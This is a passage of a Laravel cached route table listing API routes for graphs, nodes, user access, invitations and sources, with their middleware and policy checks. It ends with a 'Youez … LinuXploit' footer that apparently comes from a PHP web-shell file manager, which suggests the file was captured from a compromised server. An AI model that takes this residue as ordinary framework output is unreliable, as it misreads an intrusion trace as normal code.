        array (
          0 => 'api',
          1 => 'api',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\GraphController@create',
        'controller' => 'App\\Http\\Controllers\\CRUD\\GraphController@create',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph',
        'where' => 
        array (
        ),
        'as' => 'generated::LkW6WlanXiLYnDdS',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::dG7CNXbphqLDDrVR' => 
    array (
      'methods' => 
      array (
        0 => 'PUT',
      ),
      'uri' => 'api/graph/{graph}',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
          2 => 'can:update,graph',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\GraphController@update',
        'controller' => 'App\\Http\\Controllers\\CRUD\\GraphController@update',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph',
        'where' => 
        array (
        ),
        'as' => 'generated::dG7CNXbphqLDDrVR',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::FAobFrYoyjb6oXyt' => 
    array (
      'methods' => 
      array (
        0 => 'DELETE',
      ),
      'uri' => 'api/graph/{graph}',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
          2 => 'can:delete,graph',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\GraphController@delete',
        'controller' => 'App\\Http\\Controllers\\CRUD\\GraphController@delete',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph',
        'where' => 
        array (
        ),
        'as' => 'generated::FAobFrYoyjb6oXyt',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::WNm3p1yCW4KowmOK' => 
    array (
      'methods' => 
      array (
        0 => 'POST',
      ),
      'uri' => 'api/graph/{graph}/toggleFollow',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
          2 => 'can:view,graph',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\GraphController@toggleFollow',
        'controller' => 'App\\Http\\Controllers\\CRUD\\GraphController@toggleFollow',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph',
        'where' => 
        array (
        ),
        'as' => 'generated::WNm3p1yCW4KowmOK',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::74QzPaG3KObrwMoI' => 
    array (
      'methods' => 
      array (
        0 => 'GET',
        1 => 'HEAD',
      ),
      'uri' => 'api/graph/{graph}',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
          2 => 'can:view,graph',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\GraphController@show',
        'controller' => 'App\\Http\\Controllers\\CRUD\\GraphController@show',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph',
        'where' => 
        array (
        ),
        'as' => 'generated::74QzPaG3KObrwMoI',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::GBl8RXUmFEzzJLvQ' => 
    array (
      'methods' => 
      array (
        0 => 'POST',
      ),
      'uri' => 'api/graph/{graph}/node',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
          2 => 'auth:api',
          3 => 'can:update,graph',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\NodeController@create',
        'controller' => 'App\\Http\\Controllers\\CRUD\\NodeController@create',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph/{graph}/node',
        'where' => 
        array (
        ),
        'as' => 'generated::GBl8RXUmFEzzJLvQ',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::L2nRqBJC74keDkIK' => 
    array (
      'methods' => 
      array (
        0 => 'PUT',
      ),
      'uri' => 'api/graph/{graph}/node/{node}',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
          2 => 'auth:api',
          3 => 'can:update,graph',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\NodeController@update',
        'controller' => 'App\\Http\\Controllers\\CRUD\\NodeController@update',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph/{graph}/node',
        'where' => 
        array (
        ),
        'as' => 'generated::L2nRqBJC74keDkIK',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::aapnoO87KB9HuefO' => 
    array (
      'methods' => 
      array (
        0 => 'POST',
      ),
      'uri' => 'api/graph/{graph}/node/{node}/reposition',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
          2 => 'auth:api',
          3 => 'can:update,graph',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\NodeController@reposition',
        'controller' => 'App\\Http\\Controllers\\CRUD\\NodeController@reposition',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph/{graph}/node',
        'where' => 
        array (
        ),
        'as' => 'generated::aapnoO87KB9HuefO',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::7PXtMu2PvOZ5OKjK' => 
    array (
      'methods' => 
      array (
        0 => 'POST',
      ),
      'uri' => 'api/graph/{graph}/node/{node}/reparent',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
          2 => 'auth:api',
          3 => 'can:update,graph',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\NodeController@reparent',
        'controller' => 'App\\Http\\Controllers\\CRUD\\NodeController@reparent',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph/{graph}/node',
        'where' => 
        array (
        ),
        'as' => 'generated::7PXtMu2PvOZ5OKjK',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::DyIGWd4QqDHHjBnf' => 
    array (
      'methods' => 
      array (
        0 => 'DELETE',
      ),
      'uri' => 'api/graph/{graph}/node/{node}',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
          2 => 'auth:api',
          3 => 'can:update,graph',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\NodeController@delete',
        'controller' => 'App\\Http\\Controllers\\CRUD\\NodeController@delete',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph/{graph}/node',
        'where' => 
        array (
        ),
        'as' => 'generated::DyIGWd4QqDHHjBnf',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::whV8PLlUGj0pYH65' => 
    array (
      'methods' => 
      array (
        0 => 'GET',
        1 => 'HEAD',
      ),
      'uri' => 'api/graph/{graph}/assigned_users/search',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
          2 => 'auth:api',
          3 => 'can:update,graph',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\UserGraphAccessController@search',
        'controller' => 'App\\Http\\Controllers\\CRUD\\UserGraphAccessController@search',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph/{graph}/assigned_users',
        'where' => 
        array (
        ),
        'as' => 'generated::whV8PLlUGj0pYH65',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::YdA406yvf0jzSpaA' => 
    array (
      'methods' => 
      array (
        0 => 'PUT',
      ),
      'uri' => 'api/graph/{graph}/assigned_users/{user}',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
          2 => 'auth:api',
          3 => 'can:update,graph',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\UserGraphAccessController@update',
        'controller' => 'App\\Http\\Controllers\\CRUD\\UserGraphAccessController@update',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph/{graph}/assigned_users',
        'where' => 
        array (
        ),
        'as' => 'generated::YdA406yvf0jzSpaA',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::F3bG41iOKTWK6Wbp' => 
    array (
      'methods' => 
      array (
        0 => 'DELETE',
      ),
      'uri' => 'api/graph/{graph}/assigned_users/{user}',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
          2 => 'auth:api',
          3 => 'can:update,graph',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\UserGraphAccessController@delete',
        'controller' => 'App\\Http\\Controllers\\CRUD\\UserGraphAccessController@delete',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph/{graph}/assigned_users',
        'where' => 
        array (
        ),
        'as' => 'generated::F3bG41iOKTWK6Wbp',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::xOrnxrt5Wz98y5YD' => 
    array (
      'methods' => 
      array (
        0 => 'POST',
      ),
      'uri' => 'api/graph/{graph}/invitations',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
          2 => 'auth:api',
          3 => 'can:update,graph',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\InvitationController@create',
        'controller' => 'App\\Http\\Controllers\\CRUD\\InvitationController@create',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph/{graph}/invitations',
        'where' => 
        array (
        ),
        'as' => 'generated::xOrnxrt5Wz98y5YD',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::X8mdaknNz2JTVJUW' => 
    array (
      'methods' => 
      array (
        0 => 'POST',
      ),
      'uri' => 'api/graph/{graph}/source',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
          2 => 'can:update,graph',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\SourceController@create',
        'controller' => 'App\\Http\\Controllers\\CRUD\\SourceController@create',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph/{graph}/source',
        'where' => 
        array (
        ),
        'as' => 'generated::X8mdaknNz2JTVJUW',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::l9KPR8iv19deR6HA' => 
    array (
      'methods' => 
      array (
        0 => 'PUT',
      ),
      'uri' => 'api/graph/{graph}/source/{source}',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
          2 => 'can:update,graph',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\SourceController@update',
        'controller' => 'App\\Http\\Controllers\\CRUD\\SourceController@update',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph/{graph}/source',
        'where' => 
        array (
        ),
        'as' => 'generated::l9KPR8iv19deR6HA',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::OSW5h8IqQPyc16rF' => 
    array (
      'methods' => 
      array (
        0 => 'DELETE',
      ),
      'uri' => 'api/graph/{graph}/source/{source}',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
          2 => 'can:update,graph',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\SourceController@delete',
        'controller' => 'App\\Http\\Controllers\\CRUD\\SourceController@delete',
        'namespace' => 'App\\Http\\Controllers\\CRUD',
        'prefix' => 'api/graph/{graph}/source',
        'where' => 
        array (
        ),
        'as' => 'generated::OSW5h8IqQPyc16rF',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::aWPH7YuCWndS4zc7' => 
    array (
      'methods' => 
      array (
        0 => 'GET',
        1 => 'HEAD',
      ),
      'uri' => 'api/source_types',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'api',
          1 => 'api',
        ),
        'uses' => 'App\\Http\\Controllers\\CRUD\\SourceController@types',
        'controller' => 'App\\Http\\Controllers\\CRUD\\SourceController@types',
        'namespace' => 'App\\Http\\Controllers',
        'prefix' => 'api',
        'where' => 
        array (
        ),
        'as' => 'generated::aWPH7YuCWndS4zc7',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::GNKuEjjfdWYensxZ' => 
    array (
      'methods' => 
      array (
        0 => 'GET',
        1 => 'HEAD',
      ),
      'uri' => 'web/graphs/{graph}',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'web',
          1 => 'can:view,graph',
        ),
        'uses' => 'App\\Http\\Controllers\\WebController@viewGraph',
        'controller' => 'App\\Http\\Controllers\\WebController@viewGraph',
        'namespace' => 'App\\Http\\Controllers',
        'prefix' => '',
        'where' => 
        array (
        ),
        'as' => 'generated::GNKuEjjfdWYensxZ',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
    'generated::MEQJ8c6RxkRbX59V' => 
    array (
      'methods' => 
      array (
        0 => 'GET',
        1 => 'HEAD',
      ),
      'uri' => '{any?}',
      'action' => 
      array (
        'middleware' => 
        array (
          0 => 'web',
        ),
        'uses' => 'App\\Http\\Controllers\\Engine@init',
        'controller' => 'App\\Http\\Controllers\\Engine@init',
        'namespace' => 'App\\Http\\Controllers',
        'prefix' => '',
        'where' => 
        array (
        ),
        'as' => 'generated::MEQJ8c6RxkRbX59V',
      ),
      'fallback' => false,
      'defaults' => 
      array (
      ),
      'wheres' => 
      array (
        'any' => '(.*)',
      ),
      'bindingFields' => 
      array (
      ),
      'lockSeconds' => NULL,
      'waitSeconds' => NULL,
      'withTrashed' => false,
    ),
  ),
)
);

Youez - 2016 - github.com/yon3zu
LinuXploit